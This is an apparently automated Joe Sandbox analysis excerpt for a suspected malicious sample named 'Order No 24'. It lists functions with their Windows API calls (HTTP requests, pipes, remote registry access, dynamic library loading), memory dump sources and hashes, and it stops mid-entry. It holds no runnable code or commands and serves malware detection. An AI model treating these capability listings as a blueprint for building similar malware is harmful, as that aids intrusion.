                                                                                                                                  • Instruction Fuzzy Hash: 7021F3B6900108BFDB14ABB4D986EFE77BDEF85364F104529F021A72E1DBB44D069760
                                                                                                                                  Function 009D43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009D4401
                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009D4427
                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009D4457
                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 009D449E
                                                                                                                                    • Part of subcall function 009D5052: GetLastError.KERNEL32(?,?,009D43CC,00000000,00000000,00000001), ref: 009D5067
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1951874230-3916222277
                                                                                                                                  • Opcode ID: f2b249215db9b9345804c7e6e4ad7f75e90cd64018bd61cedb60e422d6c0906f
                                                                                                                                  • Instruction ID: 2d1bae294b78ad341b04f7a5b4f274bc4f113eec7dfbe4fa142a34e8feb5dd27
                                                                                                                                  • Opcode Fuzzy Hash: f2b249215db9b9345804c7e6e4ad7f75e90cd64018bd61cedb60e422d6c0906f
                                                                                                                                  • Instruction Fuzzy Hash: 1D2180B2580208BFEB119F94CC85FBFB6ECEB88748F10C41BF109A2250DA748D469771
                                                                                                                                  Function 009E90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
                                                                                                                                    • Part of subcall function 0099D17C: GetStockObject.GDI32(00000011), ref: 0099D1CE
                                                                                                                                    • Part of subcall function 0099D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
                                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009E915C
                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 009E9163
                                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009E9178
                                                                                                                                  • DestroyWindow.USER32(?), ref: 009E9180
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                  • String ID: SysAnimate32
                                                                                                                                  • API String ID: 4146253029-1011021900
                                                                                                                                  • Opcode ID: 0023c4bf8abc2cf9545722ec002fbe6bec0a740d72a41003177b1b4a428152e1
                                                                                                                                  • Instruction ID: 2a16ccfab4210ba2a3b7e2a05f4d5328a3d77432846187d832057a08c45280f7
                                                                                                                                  • Opcode Fuzzy Hash: 0023c4bf8abc2cf9545722ec002fbe6bec0a740d72a41003177b1b4a428152e1
                                                                                                                                  • Instruction Fuzzy Hash: C421A47120428ABBEF218FA6DC84FBB77ADFF99364F100618F91492190C772DC42A760
                                                                                                                                  Function 009C9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 009C9588
                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009C95B9
                                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 009C95CB
                                                                                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009C9605
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateHandle$FilePipe
                                                                                                                                  • String ID: nul
                                                                                                                                  • API String ID: 4209266947-2873401336
                                                                                                                                  • Opcode ID: dc75d67f00d2e3a20cb3430b185e5f71054e9aec5843c05073debe7e5950b799
                                                                                                                                  • Instruction ID: feb62f8babcfe1a3d0dbb06ab212f26700117e313bcf3e3c4f995e7e1c273be6
                                                                                                                                  • Opcode Fuzzy Hash: dc75d67f00d2e3a20cb3430b185e5f71054e9aec5843c05073debe7e5950b799
                                                                                                                                  • Instruction Fuzzy Hash: F0215171900249ABEB21AF69DC09F9A77E8AF89724F204A1DFDA1D72D0D770D942CB11
                                                                                                                                  Function 009C9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 009C9653
                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009C9683
                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 009C9694
                                                                                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009C96CE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateHandle$FilePipe
                                                                                                                                  • String ID: nul
                                                                                                                                  • API String ID: 4209266947-2873401336
                                                                                                                                  • Opcode ID: 271ef5ad392d20f6b12c6fc3f2e3a72a5459ab17e323cfd77cde94441712b3e6
                                                                                                                                  • Instruction ID: 9870036bc950161b89c69216ea27fdf083ee5691a1c0bd16f8e476188c7dc1ca
                                                                                                                                  • Opcode Fuzzy Hash: 271ef5ad392d20f6b12c6fc3f2e3a72a5459ab17e323cfd77cde94441712b3e6
                                                                                                                                  • Instruction Fuzzy Hash: E4215371D002059BDB209F699D49F9AB7ECAF95734F200A1DF8A1D72D0D770D942CB52
                                                                                                                                  Function 009CDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 009CDB0A
                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009CDB5E
                                                                                                                                  • __swprintf.LIBCMT ref: 009CDB77
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00A1DC00), ref: 009CDBB5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                  • String ID: %lu
                                                                                                                                  • API String ID: 3164766367-685833217
                                                                                                                                  • Opcode ID: e41b8a13d9031bf158da785abf0b38543cd33bd9f84098290912d401965c9d80
                                                                                                                                  • Instruction ID: 1e040e915f589b73e7c5c4a1cfdea6e723b9fffac5eac91022cedbb5b628065f
                                                                                                                                  • Opcode Fuzzy Hash: e41b8a13d9031bf158da785abf0b38543cd33bd9f84098290912d401965c9d80
                                                                                                                                  • Instruction Fuzzy Hash: 26215375A00108AFCB10EFA5CD85EEEBBB8EF89704B104069F509D7351DB71EA41CB61
                                                                                                                                  Function 009BC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009BC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009BC84A
                                                                                                                                    • Part of subcall function 009BC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009BC85D
                                                                                                                                    • Part of subcall function 009BC82D: GetCurrentThreadId.KERNEL32 ref: 009BC864
                                                                                                                                    • Part of subcall function 009BC82D: AttachThreadInput.USER32(00000000), ref: 009BC86B
                                                                                                                                  • GetFocus.USER32 ref: 009BCA05
                                                                                                                                    • Part of subcall function 009BC876: GetParent.USER32(?), ref: 009BC884
                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 009BCA4E
                                                                                                                                  • EnumChildWindows.USER32(?,009BCAC4), ref: 009BCA76
                                                                                                                                  • __swprintf.LIBCMT ref: 009BCA90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                                                                  • String ID: %s%d
                                                                                                                                  • API String ID: 3187004680-1110647743
                                                                                                                                  • Opcode ID: 671086def58174e445845a9b2f3e4f4766cdc0c3364c940e79097bb85facae13
                                                                                                                                  • Instruction ID: 4500958e826c662154741745d07cee27d9a1ea8fad191c5ebb08bcaf282dfc5e
                                                                                                                                  • Opcode Fuzzy Hash: 671086def58174e445845a9b2f3e4f4766cdc0c3364c940e79097bb85facae13
                                                                                                                                  • Instruction Fuzzy Hash: 291193B56002097BCF11FFA08D85FEA3B7DAF84724F008466FE08AA182DB709546DB70
                                                                                                                                  Function 009E1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009E19F3
                                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 009E1A26
                                                                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 009E1B49
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009E1BBF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2364364464-0
                                                                                                                                  • Opcode ID: bef4c3d35702a298af4be6f2f49df4ef1cacaa860770b55c5a492108c858a98c
                                                                                                                                  • Instruction ID: 7cc95a040f29188889a63b682c097a109ee32ec306ef2e15587752cf3141fc97
                                                                                                                                  • Opcode Fuzzy Hash: bef4c3d35702a298af4be6f2f49df4ef1cacaa860770b55c5a492108c858a98c
                                                                                                                                  • Instruction Fuzzy Hash: 2E818371600205ABDF11EF65C886BADBBE5BF48720F148459F905AF382D7B4ED418B90
                                                                                                                                  Function 009EE062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 009EE1D5
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 009EE20D
                                                                                                                                  • IsDlgButtonChecked.USER32(?,00000001), ref: 009EE248
                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 009EE269
                                                                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009EE281
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188977179-0
                                                                                                                                  • Opcode ID: 0f4ecbe36feb3a23ffd0363321b8619f62b170f1c3ccdeb0ba854e7f112355e3
                                                                                                                                  • Instruction ID: d5529e703e8525c5a1bd3707950c7c539b8b3c4bfa8f38185e21b568bc7d14eb
                                                                                                                                  • Opcode Fuzzy Hash: 0f4ecbe36feb3a23ffd0363321b8619f62b170f1c3ccdeb0ba854e7f112355e3
                                                                                                                                  • Instruction Fuzzy Hash: 4661B538A08284AFDB22DF55CC94FAAB7BEEF89300F044059F959973A1C775AD81CB11
                                                                                                                                  Function 009C1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009C1CB4
                                                                                                                                  • VariantClear.OLEAUT32(00000013), ref: 009C1D26
                                                                                                                                  • VariantClear.OLEAUT32(00000000), ref: 009C1D81
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009C1DF8
                                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009C1E26
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4136290138-0
                                                                                                                                  • Opcode ID: d2af43232513f971be8c6ecc12a32d49f7cf7bf301128baf258d68dfc91f609e
                                                                                                                                  • Instruction ID: ea84f6df51e11a806963327a80d8e5e1a54b8f2869d33551fd063c020ba45a75
                                                                                                                                  • Opcode Fuzzy Hash: d2af43232513f971be8c6ecc12a32d49f7cf7bf301128baf258d68dfc91f609e
                                                                                                                                  • Instruction Fuzzy Hash: C55149B5A00209EFDB14CF58C880EAAB7B8FF4D314B158559E95ADB341D330EA52CFA5
                                                                                                                                  Function 009E0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009E06EE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 009E077D
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 009E079B
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 009E07E1
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 009E07FB
                                                                                                                                    • Part of subcall function 0099E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,009CA574,?,?,00000000,00000008), ref: 0099E675
                                                                                                                                    • Part of subcall function 0099E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,009CA574,?,?,00000000,00000008), ref: 0099E699
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 327935632-0
                                                                                                                                  • Opcode ID: 585277d7ffb14e53e83d403635b6b833e0f53f452524a4880e7aa2ed608fabc2
                                                                                                                                  • Instruction ID: 7ada7dd49eaf98b4d75661e7a3adadcfdf3cb313813a53b905267eb826c5b7d3
                                                                                                                                  • Opcode Fuzzy Hash: 585277d7ffb14e53e83d403635b6b833e0f53f452524a4880e7aa2ed608fabc2
                                                                                                                                  • Instruction Fuzzy Hash: 52514B75A00249DFCB01EFA8C885EADB7B5BF98310F04805AE915AB352DB75ED46CF90
                                                                                                                                  Function 009E2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E2EEF
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009E2F2E
                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 009E2F75
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 009E2FA1
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 009E2FAE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3740051246-0
                                                                                                                                  • Opcode ID: 8517052be045454cc5d1a7f35271f98e45e9f89ca4fe5afee5680bb55a50a45b
                                                                                                                                  • Instruction ID: b75f208ed463a3d5a14d4805f7dc4c259ac06b9de190efe0b53643e3e64b8aec
                                                                                                                                  • Opcode Fuzzy Hash: 8517052be045454cc5d1a7f35271f98e45e9f89ca4fe5afee5680bb55a50a45b
                                                                                                                                  • Instruction Fuzzy Hash: D3515972608244AFD705EFA5C891F6ABBF8BF88304F04881DF59697291DB70ED05CB52
                                                                                                                                  Function 009ECCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 216ae4503c445e081f5097d13f7258f4c21c1b126f4b8fbd18a0eb4e6a99748f
                                                                                                                                  • Instruction ID: f41ef6cbb15d18cd0266bc830c61e1e262a8dc5aa5144f4e5e22b06930931c0f
                                                                                                                                  • Opcode Fuzzy Hash: 216ae4503c445e081f5097d13f7258f4c21c1b126f4b8fbd18a0eb4e6a99748f
                                                                                                                                  • Instruction Fuzzy Hash: E041D6BA900288ABC712DBA9CC44FA9BB6DEB09310F150125F999A72D1C735AD93D650
                                                                                                                                  Function 009D1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009D12B4
                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009D12DD
                                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009D131C
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009D1341
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009D1349
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1389676194-0
                                                                                                                                  • Opcode ID: 3b8a53890611cca2dee654c4715e311c2010f436b436ff49c74fbd59170350b4
